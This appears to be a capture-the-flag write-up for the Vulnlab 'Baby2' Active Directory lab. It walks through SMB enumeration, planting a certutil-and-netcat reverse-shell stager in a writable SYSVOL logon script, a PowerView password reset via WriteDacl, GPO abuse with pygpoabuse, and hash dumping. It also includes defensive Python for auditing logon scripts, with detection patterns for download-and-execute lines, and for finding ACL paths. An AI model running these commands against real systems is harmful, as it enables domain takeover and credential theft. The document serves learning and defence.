Baby2


Baby2, created by xct and r0BIT on Vulnlab, is an Active Directory machine built around misconfigured logon scripts and GPO abuse.


Enumeration

Start an nmap scan to look for open ports, adding the usual flags for in-depth enumeration.

From the scan we can take note of the domain name (baby2.vl) and start the process of null enumeration.

There is a null SMB share available for us to investigate.

Use the spider_plus module in netexec (the maintained fork of crackmapexec) to list the files in the share.

netexec smb 10.10.103.3 -u 'null' -p '' -M spider_plus

The CHANGELOG file hints at a script.

There is an .lnk file that leads to it; the shortcut shows that the script lives in the SYSVOL share.

Looking through the other shared folders, we come across a potential list of usernames in the home share.

With no password clues available, the next best thing is to try each username as its own password.

This gives us two valid users. Next, check what access each of them has over WinRM, LDAP, RDP and SMB.

The user carl.moore can read the SYSVOL share, which is where the .lnk file we found earlier points.


Initial Foothold

Using smbclient, this user can access the scripts folder in SYSVOL.

Download the login.vbs script and edit the script to add a reverse shell.

Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c mkdir C:\Temp"
oShell.run "cmd.exe /c certutil -urlcache -f http://10.8.1.176:8888/nc.exe C:\Temp\nc.exe"
oShell.run "cmd.exe /c C:\Temp\nc.exe 10.8.1.176 443 -e cmd.exe"

These added lines first create a temp directory, then download netcat from our Python HTTP server, and finally run netcat to connect back with a reverse shell.

Upload the modified script to the scripts folder and wait for the logon script to run.

After some time, we have a shell.
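The foothold works because a low-privileged user can overwrite a logon script in SYSVOL, and nothing notices the change. As an added example (not part of this writeup or of the Vulnlab machine), the following Python script shows the check a defender would run against the scripts directory: it compares each script's SHA-256 against a baseline recorded at the last review and scans the content for download-and-execute patterns such as the certutil line used above. The sample script bodies, the baseline and the `load_scripts` path handling are constructed for the example.

```python
"""Audit SYSVOL logon scripts for tampering (added example, constructed input)."""
import hashlib
import re
from pathlib import Path

# Patterns a defender would not expect in a legitimate logon script.
SUSPICIOUS = [
    ("certutil-urlcache", re.compile(r"certutil(\.exe)?\s+-urlcache", re.I)),
    ("netcat-shell", re.compile(r"\bnc(64)?\.exe\b.*\s-e\s", re.I)),
    ("powershell-encoded", re.compile(r"powershell[^\n]*-(enc|encodedcommand)\b", re.I)),
    ("dotnet-download", re.compile(r"(Invoke-WebRequest|DownloadString|DownloadFile)", re.I)),
    ("raw-ip-url", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I)),
]

def scan_script(text):
    """Return the names of every suspicious pattern found in one script body."""
    return [name for name, pat in SUSPICIOUS if pat.search(text)]

def sha256(text):
    """Hex SHA-256 of a script body, used for the baseline comparison."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def audit(scripts, baseline):
    """scripts: {name: content}. baseline: {name: sha256 hex} recorded at the last review.
    Returns {name: {"changed": bool, "hits": [...]}} for every script needing attention."""
    findings = {}
    for name, content in scripts.items():
        changed = baseline.get(name) != sha256(content)
        hits = scan_script(content)
        if changed or hits:
            findings[name] = {"changed": changed, "hits": hits}
    return findings

def load_scripts(scripts_dir):
    """Read real scripts from a directory, e.g. a mounted \\\\dc\\SYSVOL\\<domain>\\scripts (assumed path)."""
    exts = {".vbs", ".bat", ".cmd", ".ps1"}
    return {p.name: p.read_text(errors="replace")
            for p in Path(scripts_dir).iterdir() if p.suffix.lower() in exts}

# Constructed sample: the login.vbs as recorded in the baseline, and the same script
# after a download-and-execute stager (the certutil line from the writeup) was appended.
CLEAN_LOGIN_VBS = ('Set oShell = CreateObject("Wscript.Shell")\r\n'
                   'oShell.run "net use H: \\\\fileserver\\home"\r\n')
TAMPERED_LOGIN_VBS = CLEAN_LOGIN_VBS + (
    'oShell.run "cmd.exe /c certutil -urlcache -f http://10.8.1.176:8888/nc.exe C:\\Temp\\nc.exe"\r\n')
BASELINE = {"login.vbs": sha256(CLEAN_LOGIN_VBS)}

if __name__ == "__main__":
    for name, f in audit({"login.vbs": TAMPERED_LOGIN_VBS}, BASELINE).items():
        print(name, "CHANGED" if f["changed"] else "unchanged", f["hits"])
```

Run it on a schedule against the real share with `audit(load_scripts(path), saved_baseline)`; a non-empty result means either someone legitimately updated a script (re-baseline after review) or, as in this box, a writable scripts folder has been abused. The lasting fix is the ACL: only administrators should be able to write to the scripts directory.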


Privilege Escalation

Use BloodHound to get a clear overview of the domain.

The amelia.griffith user has a logon script set. If you leave the Python server running, you will see it repeatedly downloading netcat because of the modified script.

We can also see that this user is able to RDP.

Looking at the node itself, we notice that AMELIA.GRIFFITH belongs to the legacy group, which has WriteDacl over GPOADM.

WriteDacl – BloodHound (bloodhoundenterprise.io)

First, bring PowerView over to the victim machine.

certutil -urlcache -f http://10.8.1.176:8888/powerview.ps1 powerview.ps1

powershell -ep bypass

import-module .\powerview.ps1

Then run the following to change the password of the gpoadm user.

add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"
$cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
set-domainuserpassword gpoadm -accountpassword $cred

Use CME to check that the password has been changed.


Using BloodHound again, we notice that the GPOADM user has GenericAll over the Default Domain Controllers Policy.

GenericAll – BloodHound (bloodhoundenterprise.io)

First, we need to find the GPO's path ID (its GUID) in the policy.

We can then use pygpoabuse.py to add the gpoadm user to the local Administrators group.

python3.9 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -f -dc-ip 10.10.89.216 -command 'net localgroup administrators /add gpoadm'

Once the GPO has been applied, the gpoadm user is a local administrator on the domain controller.
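The whole escalation is one chain of ACL edges: group membership, then WriteDacl on a user, then GenericAll on a Tier 0 GPO. As an added example (not part of this writeup or of BloodHound itself), the Python below walks BloodHound-style (source, right, target) edges from a given principal and reports every path that ends on a Tier 0 object, plus the individual ACEs a defender would remove to break it. The edge list is constructed to mirror the path described above; the node names, the Tier 0 set and the edge-type vocabulary are assumptions.

```python
"""Find ACL control paths to Tier 0 objects (added example, constructed edges)."""
from collections import deque

# Rights that let the holder take control of the target or of its ACL.
CONTROL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner", "GenericWrite",
                  "ForceChangePassword", "AddMember", "AllExtendedRights"}
# Not an ACL right, but membership carries every right of the group.
MEMBERSHIP = {"MemberOf"}
TRAVERSABLE = CONTROL_RIGHTS | MEMBERSHIP

# Well-known GUIDs of the two default GPOs; both should be treated as Tier 0.
DEFAULT_GPO_GUIDS = {
    "31B2F340-016D-11D2-945F-00C04FB984F9": "Default Domain Policy",
    "6AC1786C-016F-11D2-945F-00C04FB984F9": "Default Domain Controllers Policy",
}

def is_tier0(node, tier0):
    """A node is Tier 0 if listed explicitly or if it carries a default GPO GUID."""
    upper = node.upper()
    return node in tier0 or any(g in upper for g in DEFAULT_GPO_GUIDS)

def build_graph(edges):
    graph = {}
    for src, right, dst in edges:
        graph.setdefault(src, []).append((right, dst))
    return graph

def find_paths(edges, start, tier0, max_depth=6):
    """BFS from `start` over membership and control edges.
    Returns every path (list of (src, right, dst) steps) that reaches a Tier 0 node."""
    graph = build_graph(edges)
    paths, queue = [], deque([(start, [])])
    while queue:
        node, path = queue.popleft()
        if path and is_tier0(node, tier0):
            paths.append(path)
            continue            # do not expand beyond the first Tier 0 hit
        if len(path) >= max_depth:
            continue
        for right, nxt in graph.get(node, []):
            if right not in TRAVERSABLE:
                continue
            if nxt == start or any(step[2] == nxt for step in path):
                continue        # avoid cycles
            queue.append((nxt, path + [(node, right, nxt)]))
    return paths

def offending_aces(paths):
    """The control ACEs that appear on any path; removing them breaks the chain."""
    return {step for path in paths for step in path if step[1] in CONTROL_RIGHTS}

def format_path(path):
    return path[0][0] + "".join(f" -[{r}]-> {d}" for _, r, d in path)

# Constructed edge list mirroring the chain found in this box.
EDGES = [
    ("AMELIA.GRIFFITH@BABY2.VL", "MemberOf", "LEGACY@BABY2.VL"),
    ("LEGACY@BABY2.VL", "WriteDacl", "GPOADM@BABY2.VL"),
    ("GPOADM@BABY2.VL", "GenericAll", "DEFAULT DOMAIN CONTROLLERS POLICY@BABY2.VL"),
    ("DEFAULT DOMAIN CONTROLLERS POLICY@BABY2.VL", "GpLink", "DOMAIN CONTROLLERS@BABY2.VL"),
    ("CARL.MOORE@BABY2.VL", "MemberOf", "DOMAIN USERS@BABY2.VL"),
    ("DOMAIN USERS@BABY2.VL", "CanRDP", "DC@BABY2.VL"),   # not a control edge; ignored
]
TIER0 = {"DEFAULT DOMAIN CONTROLLERS POLICY@BABY2.VL", "DOMAIN ADMINS@BABY2.VL"}

if __name__ == "__main__":
    found = find_paths(EDGES, "AMELIA.GRIFFITH@BABY2.VL", TIER0)
    for p in found:
        print(format_path(p))
    for ace in sorted(offending_aces(found)):
        print("remove ACE:", ace)
```

In a real assessment the edges come from a BloodHound export; the point of the small walker is that the fix is not "reset gpoadm's password" but removing the WriteDacl ACE on GPOADM and the GenericAll ACE on the GPO, and keeping the default domain controller policy editable only by Tier 0 accounts.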

Use secretsdump to dump out the hashes.

Use the Administrator hash to log in over WinRM as admin.
